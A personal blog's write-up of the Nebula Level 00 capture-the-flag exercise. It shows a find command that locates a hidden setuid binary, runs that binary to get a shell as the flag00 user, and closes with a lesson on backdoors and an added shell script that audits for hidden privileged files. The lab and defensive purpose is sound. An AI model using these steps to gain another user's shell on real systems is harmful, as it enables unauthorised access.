blog.ferling.eu by Benedikt Ferling


 

exploit-exercises.com/nebula -- Level 00

Problem

  1. Security by obscurity!

This is the concept of hiding something in the hope that only users who share the same knowledge can reveal the secret. But it is only a hope. One buzzword for the same technique, although in a different context, is the backdoor. The past has shown, however, that this is not a good technique in terms of security.

Exploit

Find the executable.

find / -executable -type f -user flag00 2>/dev/null

delivers the following list:

/bin/.../flag00
/rofs/bin/.../flag00

Two suspicious programs. Executing one of them gives us a shell as user flag00. Afterwards we can execute getflag.

/bin/.../flag00
getflag 

Alternate solution

You can also just pipe the string to the program on its standard input.

echo "getflag" | /rofs/bin/.../flag00

Lesson / How to fix

  1. The only solution is to avoid this technique completely!

Many backdoors, hidden services, undocumented open ports, information stored within other document formats (text within pictures…) and many more have been revealed. It is bad practice in terms of security!
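
From the administrator's side, the same search can be turned into an audit. The following is an added example, not part of the original post: it lists setuid/setgid files that sit below a dot-prefixed directory, assuming the "..." in the paths above is the directory's literal name. The function names are hypothetical and GNU find is assumed.

```shell
#!/bin/sh
# Added example, not from the original post. Requires GNU find (-perm /MODE, -printf).

# find_hidden_privileged ROOT
# Lists "owner mode path" for each regular file under ROOT that carries the
# setuid or setgid bit AND lives below a dot-prefixed directory.
find_hidden_privileged() {
    root=${1:-/}
    (
        # Scan relative to ROOT so that a dot-directory in ROOT's own path
        # (e.g. a temp dir) cannot cause false matches.
        cd "$root" || exit 2
        # -xdev: stay on this filesystem; -perm /6000: setuid OR setgid;
        # -path '*/.*/*': some directory component starts with a dot.
        find . -xdev -type f -perm /6000 -path '*/.*/*' \
            -printf '%u %m %p\n' 2>/dev/null
    )
}

# audit_hidden_privileged ROOT
# Returns 0 when nothing is found, 1 (and prints the findings) otherwise.
audit_hidden_privileged() {
    findings=$(find_hidden_privileged "$1")
    if [ -z "$findings" ]; then
        return 0
    fi
    printf 'privileged files below hidden directories:\n%s\n' "$findings" >&2
    return 1
}

# Usage: audit_hidden_privileged /   (run as root to see every directory)
```

The non-zero return code makes the check usable from cron or a configuration-management run; paths are printed relative to the scanned root.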

